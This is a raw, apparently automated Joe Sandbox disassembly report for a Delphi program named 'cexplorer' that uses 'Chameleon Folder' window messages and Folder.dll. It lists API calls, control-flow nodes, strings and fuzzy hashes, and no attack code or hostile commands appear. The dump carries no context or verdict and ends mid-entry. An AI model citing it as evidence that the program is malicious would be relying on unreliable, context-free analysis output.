27513 355a6f3 27511->27513 27514 355a6c7 27512->27514 27515 3557464 11 API calls 27513->27515 27516 355a504 13 API calls 27514->27516 27517 355a6fb 27515->27517 27518 355a6ce 27516->27518 27517->27443 27518->27509 27519 3557464 11 API calls 27518->27519 27519->27509 27521 355834f 27520->27521 27538 35575ec 27521->27538 27524->27480 27525->27481 27526->27485 27527->27488 27528->27472 27530 355a519 27529->27530 27531 355a536 FindFirstFileW 27530->27531 27532 355a546 FindClose 27531->27532 27533 355a54c 27531->27533 27532->27533 27534 3557464 11 API calls 27533->27534 27535 355a561 27534->27535 27535->27493 27537 355754c GetUserDefaultUILanguage GetLocaleInfoW 27536->27537 27537->27505 27539 35575fc 27538->27539 27542 3557488 27539->27542 27543 355748e 27542->27543 27544 35574a9 27542->27544 27543->27544 27546 3554fe0 11 API calls 27543->27546 27544->27447 27546->27544 27547 355b1d8 27548 355b1e1 27547->27548 27549 355b1fa 27547->27549 27553 355b1a0 27548->27553 27552 355b1ef TlsFree 27552->27549 27554 355b1d4 27553->27554 27555 355b1a9 27553->27555 27554->27549 27554->27552 27555->27554 27556 355b1b2 TlsGetValue 27555->27556 27556->27554 27557 355b1c1 LocalFree TlsSetValue 27556->27557 27557->27554 27558 35537b8 27562 355374c 27558->27562 27560 35537c1 VirtualAlloc 27561 35537d8 27560->27561 27563 35536ec 27562->27563 27563->27560 27564 3554ea8 27565 3554ecd 27564->27565 27566 3554ebb VirtualFree 27565->27566 27567 3554ed1 27565->27567 27566->27565 27568 3554f37 VirtualFree 27567->27568 27569 3554f4d 27567->27569 27568->27567 27570 35e6900 27571 35e695a SetForegroundWindow AllowSetForegroundWindow 27570->27571 27572 35e6972 27570->27572 27602 35e6a7c 27571->27602 27573 35e6a1f 27572->27573 27574 35e6981 27572->27574 27577 35e6a2e GlobalGetAtomNameW 27573->27577 27578 35e6af8 27573->27578 27603 35e8398 21 API calls 27574->27603 27576 35574c4 11 API calls 27580 35e6ccc 27576->27580 27581 35e6a55 27577->27581 27577->27602 27582 35e6b07 GlobalGetAtomNameW 27578->27582 27583 35e6bf2 27578->27583 27579 35e699c 27588 35e69a4 GlobalAddAtomW 27579->27588 27584 3557464 11 API calls 27580->27584 27590 35e6a68 GlobalDeleteAtom 27581->27590 27587 35e6b2e 27582->27587 27582->27602 27585 35e6c97 DefWindowProcW 27583->27585 27586 35e6c01 27583->27586 27589 35e6cd4 27584->27589 27585->27602 27608 35e9498 22 API calls 27586->27608 27592 35e6b41 GlobalDeleteAtom 27587->27592 27588->27602 27604 35e8d58 22 API calls 27590->27604 27605 35e7c80 35 API calls 27592->27605 27594 35e6c1a 27596 35e6c22 GlobalAddAtomW 27594->27596 27596->27602 27597 35e6b54 27598 35e6b6b 27597->27598 27599 35e6b58 27597->27599 27607 35e8afc 24 API calls 27598->27607 27606 35e8868 SendMessageTimeoutW GetLastError 27599->27606 27602->27576 27603->27579 27604->27602 27605->27597 27606->27602 27607->27602 27608->27594

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0355A6FC,?,?), ref: 0355A66E
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0355A6FC,?,?), ref: 0355A677
                                                                                                              • Part of subcall function 0355A504: FindFirstFileW.KERNEL32(00000000,?,00000000,0355A562,?,00000001), ref: 0355A537
                                                                                                              • Part of subcall function 0355A504: FindClose.KERNEL32(00000000,00000000,?,00000000,0355A562,?,00000001), ref: 0355A547
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3216391948-0
                                                                                                            • Opcode ID: 006f578be5ced7e61e590725e4734bf7994ddf658c6ed0ef26ae25c63cd698f4
                                                                                                            • Instruction ID: e0c4849625ee1a03b03ccb28344e5adf4f229f36c0d3f14049de246b4a74397e
                                                                                                            • Opcode Fuzzy Hash: 006f578be5ced7e61e590725e4734bf7994ddf658c6ed0ef26ae25c63cd698f4
                                                                                                            • Instruction Fuzzy Hash: 5E116378A0034A9BDF05EF94E861AADB7B8FF88300F504166BD05AB261DB747E04D665

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0355A562,?,00000001), ref: 0355A537
                                                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0355A562,?,00000001), ref: 0355A547
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: 7abacd5bd0885bbfcd42fd1a17623bd31bf2f374a6dbbc732200a3a848463af6
                                                                                                            • Instruction ID: 0bf278109e2fa9a963c8f97fceaf2e6d54014c468eb32bae451407057779a276
                                                                                                            • Opcode Fuzzy Hash: 7abacd5bd0885bbfcd42fd1a17623bd31bf2f374a6dbbc732200a3a848463af6
                                                                                                            • Instruction Fuzzy Hash: 01F08279504705AFCB11EF78EC61D5EB7BCFB89610B9006A2BC18D7561E634BF109514
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 31276548-0
                                                                                                            • Opcode ID: f8cd5c5639be6c8299dc47c4658b2f268de53f7e986acf187d368744a37de2b0
                                                                                                            • Instruction ID: b4e355f2f9599de24e75dc8c69876a67925a3c7d35b76253fc8028500c2a2d94
                                                                                                            • Opcode Fuzzy Hash: f8cd5c5639be6c8299dc47c4658b2f268de53f7e986acf187d368744a37de2b0
                                                                                                            • Instruction Fuzzy Hash: 6DA012184085014BC804EB185C4250F72902A80010FC80610785C99291FA05957482D7

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,035E6FA7,?,00000000,035E7016), ref: 035E6E28
                                                                                                            • RegisterClassExW.USER32(00000030), ref: 035E6E96
                                                                                                              • Part of subcall function 0355C400: CreateWindowExW.USER32(000000A0,00000000,?,00000000,00000000,035E6FA7,?,00000000,035E7016,?,?,?), ref: 0355C43F
                                                                                                            • RegisterWindowMessageW.USER32(WM_SET_FOREGROUND by Chameleon Folder,00000000,03550000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,00000000,00000000,00000000,035E6FA7,?,00000000), ref: 035E6ED4
                                                                                                            • RegisterWindowMessageW.USER32(WM_PATH_DIALOG_GET by Chameleon Folder,?,00000001,WM_SET_FOREGROUND by Chameleon Folder,00000000,03550000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,00000000,00000000,00000000), ref: 035E6EF0
                                                                                                            • RegisterWindowMessageW.USER32(WM_PATH_DIALOG_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_GET by Chameleon Folder,?,00000001,WM_SET_FOREGROUND by Chameleon Folder,00000000,03550000,00000000,00000000,00000000,00000000,00000000,00000000,80000000), ref: 035E6F0C
                                                                                                            • RegisterWindowMessageW.USER32(WM_PATH_BROWSE_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_GET by Chameleon Folder,?,00000001,WM_SET_FOREGROUND by Chameleon Folder,00000000,03550000,00000000,00000000,00000000,00000000), ref: 035E6F28
                                                                                                            • RegisterWindowMessageW.USER32(WM_DIALOG_YPS by Chameleon Folder,?,00000001,WM_PATH_BROWSE_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_GET by Chameleon Folder,?,00000001,WM_SET_FOREGROUND by Chameleon Folder,00000000,03550000,00000000), ref: 035E6F44
                                                                                                            • RegisterWindowMessageW.USER32(WM_HOOK_LOG by Chameleon Folder,?,00000001,WM_DIALOG_YPS by Chameleon Folder,?,00000001,WM_PATH_BROWSE_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_GET by Chameleon Folder,?,00000001,WM_SET_FOREGROUND by Chameleon Folder), ref: 035E6F60
                                                                                                            • RegisterWindowMessageW.USER32(WM_HOOK_WINDOW by Chameleon Folder,?,00000001,WM_HOOK_LOG by Chameleon Folder,?,00000001,WM_DIALOG_YPS by Chameleon Folder,?,00000001,WM_PATH_BROWSE_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_GET by Chameleon Folder), ref: 035E6F7C
                                                                                                            • LoadLibraryW.KERNEL32(Folder.dll,?,00000001,WM_HOOK_WINDOW by Chameleon Folder,?,00000001,WM_HOOK_LOG by Chameleon Folder,?,00000001,WM_DIALOG_YPS by Chameleon Folder,?,00000001,WM_PATH_BROWSE_SET by Chameleon Folder,?,00000001,WM_PATH_DIALOG_SET by Chameleon Folder), ref: 035E6F98
                                                                                                            Strings
                                                                                                            • WM_HOOK_WINDOW by Chameleon Folder, xrefs: 035E6F77
                                                                                                            • 0, xrefs: 035E6E49
                                                                                                            • ChameleonFolderHelper, xrefs: 035E6E3F
                                                                                                            • WM_PATH_BROWSE_SET by Chameleon Folder, xrefs: 035E6F23
                                                                                                            • WM_PATH_DIALOG_SET by Chameleon Folder, xrefs: 035E6F07
                                                                                                            • WM_PATH_DIALOG_GET by Chameleon Folder, xrefs: 035E6EEB
                                                                                                            • WM_HOOK_LOG by Chameleon Folder, xrefs: 035E6F5B
                                                                                                            • WM_DIALOG_YPS by Chameleon Folder, xrefs: 035E6F3F
                                                                                                            • WM_SET_FOREGROUND by Chameleon Folder, xrefs: 035E6ECF
                                                                                                            • Folder.dll, xrefs: 035E6F93
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: RegisterWindow$Message$ClassCreateCurrentLibraryLoadProcess
                                                                                                            • String ID: 0$ChameleonFolderHelper$Folder.dll$WM_DIALOG_YPS by Chameleon Folder$WM_HOOK_LOG by Chameleon Folder$WM_HOOK_WINDOW by Chameleon Folder$WM_PATH_BROWSE_SET by Chameleon Folder$WM_PATH_DIALOG_GET by Chameleon Folder$WM_PATH_DIALOG_SET by Chameleon Folder$WM_SET_FOREGROUND by Chameleon Folder
                                                                                                            • API String ID: 423585798-665509755
                                                                                                            • Opcode ID: b7c640d08c858675c8c9bd0a371aafee0e41ef49aa18b3fc795821dacb4e4d95
                                                                                                            • Instruction ID: 46e42ca9b2fb45e0ec2dac97fa9206e97d41ab9a92581d12f2657cb2510c800c
                                                                                                            • Opcode Fuzzy Hash: b7c640d08c858675c8c9bd0a371aafee0e41ef49aa18b3fc795821dacb4e4d95
                                                                                                            • Instruction Fuzzy Hash: 54516D74A00709AED708EFB4E891F9E77F8FB98704F514426F810EB275E771A9059B50

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0355A34D,?,?), ref: 0355A161
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0355A34D,?,?), ref: 0355A1AA
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0355A34D,?,?), ref: 0355A1CC
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0355A1EA
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0355A208
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0355A226
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0355A244
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0355A330,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0355A34D), ref: 0355A284
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0355A330,?,80000001), ref: 0355A2AF
                                                                                                            • RegCloseKey.ADVAPI32(?,0355A337,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0355A330,?,80000001,Software\Embarcadero\Locales), ref: 0355A32A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                                            • API String ID: 2701450724-3496071916
                                                                                                            • Opcode ID: f9a43c4185e634ff887158bcdc827909b0a8bf8c2249e3ee604d4be9eafa9044
                                                                                                            • Instruction ID: 02a3a6aedc836782427d02b4822ab19aa1caeaeeb5d11a5d6c26b4e09c08ce9e
                                                                                                            • Opcode Fuzzy Hash: f9a43c4185e634ff887158bcdc827909b0a8bf8c2249e3ee604d4be9eafa9044
                                                                                                            • Instruction Fuzzy Hash: 8D518879A40309BEEB11DA94EC61FAEB7BCFB58704F550163BE14EA1A1D770BA40C650

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SetForegroundWindow.USER32(?), ref: 035E695E
                                                                                                            • AllowSetForegroundWindow.USER32(000000FF), ref: 035E6968
                                                                                                            • GlobalAddAtomW.KERNEL32(00000000), ref: 035E69A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ForegroundWindow$AllowAtomGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 4093426540-0
                                                                                                            • Opcode ID: b3d9d71e70c31f82685d9d812523df828c5e00c97f598600c5534f5a040eb0df
                                                                                                            • Instruction ID: a4225ff22575d1ea35960b76ffd497079457b0481da9fc85013e0c5f0a60f7e2
                                                                                                            • Opcode Fuzzy Hash: b3d9d71e70c31f82685d9d812523df828c5e00c97f598600c5534f5a040eb0df
                                                                                                            • Instruction Fuzzy Hash: EC617F75A04309EFCB14EFA4E89099E77F9FB98350F5148A6F818D7260E734EA40CB20

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 112 35e9b9c-35e9ba6 113 35e9c3f-35e9c47 112->113 114 35e9bac 112->114 117 35e9c49-35e9c51 UnmapViewOfFile 113->117 118 35e9c56-35e9c5e 113->118 115 35e9c72-35e9c74 114->115 116 35e9bb2-35e9bd6 CreateFileMappingW 114->116 119 35e9bd8-35e9be1 116->119 120 35e9be6-35e9c15 GetLastError MapViewOfFile 116->120 117->118 121 35e9c6d call 35e7348 118->121 122 35e9c60-35e9c68 CloseHandle 118->122 119->115 124 35e9c38 call 35e7328 120->124 125 35e9c17-35e9c31 call 35553bc 120->125 121->115 122->121 129 35e9c3d 124->129 125->124 129->115
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER},?,?,035F0803,00000001), ref: 035E9BC1
                                                                                                            • GetLastError.KERNEL32(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER},?,?,035F0803,00000001), ref: 035E9BE6
                                                                                                            • MapViewOfFile.KERNEL32(000004EC,00000006,00000000,00000000,00000028,?,000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER},?,?,035F0803,00000001), ref: 035E9C04
                                                                                                            • UnmapViewOfFile.KERNEL32(033C0000,?,?,035F0803,00000001), ref: 035E9C51
                                                                                                            • CloseHandle.KERNEL32(000004EC,?,?,035F0803,00000001), ref: 035E9C68
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 035E9BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$View$CloseCreateErrorHandleLastMappingUnmap
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 3716401421-4124573863
                                                                                                            • Opcode ID: 07fd567ee98f39f4c283e5f51b16310633bb700fabc0c6427e36cfd207c22337
                                                                                                            • Instruction ID: dcad325f092e40b9bd90dd9a2139309d2c106eecaf1f03c4754a58a85684b4e0
                                                                                                            • Opcode Fuzzy Hash: 07fd567ee98f39f4c283e5f51b16310633bb700fabc0c6427e36cfd207c22337
                                                                                                            • Instruction Fuzzy Hash: AB2144B9244301AFE759FBA8E885F1877E4FB8A320F008195F914DF2B4C774A885AB10

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 130 3556e48-3556e55 131 3556e57 130->131 132 3556e5c-3556e90 GetCurrentThreadId 130->132 131->132 133 3556e94-3556ec0 call 3556d2c 132->133 134 3556e92 132->134 137 3556ec2-3556ec4 133->137 138 3556ec9-3556ed0 133->138 134->133 137->138 139 3556ec6 137->139 140 3556ed2-3556ed5 138->140 141 3556eda-3556ee0 138->141 139->138 140->141 142 3556ee5-3556eec 141->142 143 3556ee2 141->143 144 3556eee-3556ef5 142->144 145 3556efb-3556eff 142->145 143->142 144->145 146 3556f05-3556f0a call 3556ddc 145->146 147 355718c-355719c 145->147 146->147 148 35571af-35571b6 147->148 149 355719e-35571aa call 355706c call 35570f4 147->149 153 35571d9-35571dd 148->153 154 35571b8-35571c3 GetCurrentThreadId 148->154 149->148 155 3557201-3557205 153->155 156 35571df-35571e6 153->156 154->153 158 35571c5-35571d4 call 3556d4c call 35570c8 154->158 161 3557215-3557219 155->161 162 3557207-355720e 155->162 156->155 160 35571e8-35571ff 156->160 158->153 160->155 166 3557238-3557241 call 3556d74 161->166 167 355721b-3557224 call 3555068 161->167 162->161 165 3557210-3557212 162->165 165->161 175 3557243-355724a 166->175 176 355724c-3557250 166->176 167->166 177 3557226-3557236 call 355578c call 3555068 167->177 175->176 179 355726f-355727a call 3556d4c 175->179 176->179 180 3557252-3557263 call 355a9f0 176->180 177->166 187 355727c 179->187 188 355727f-3557283 179->188 180->179 190 3557265-3557267 180->190 187->188 191 3557285-3557287 call 35570c8 188->191 192 355728c-355728f 188->192 190->179 193 3557269-355726a FreeLibrary 190->193 191->192 195 3557291-3557298 192->195 196 35572ab-35572ba 192->196 193->179 197 35572a0-35572a6 ExitProcess 195->197 198 355729a 195->198 196->155 198->197
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03556E7F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 233875d7a55b655a87f4482a2bba29cad5e0d2f4974c2662009a4044adac3497
                                                                                                            • Instruction ID: 91cdb3e26aca867d8f3bec2d7067a8656ca7bfb9a7efb0129accc7e4a7f1481a
                                                                                                            • Opcode Fuzzy Hash: 233875d7a55b655a87f4482a2bba29cad5e0d2f4974c2662009a4044adac3497
                                                                                                            • Instruction Fuzzy Hash: 225164756007858FDB20EF69E4A8B5ABBE8FB49310F08455AFC098B274D771F889CB15

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,0356C860), ref: 0356C7A5
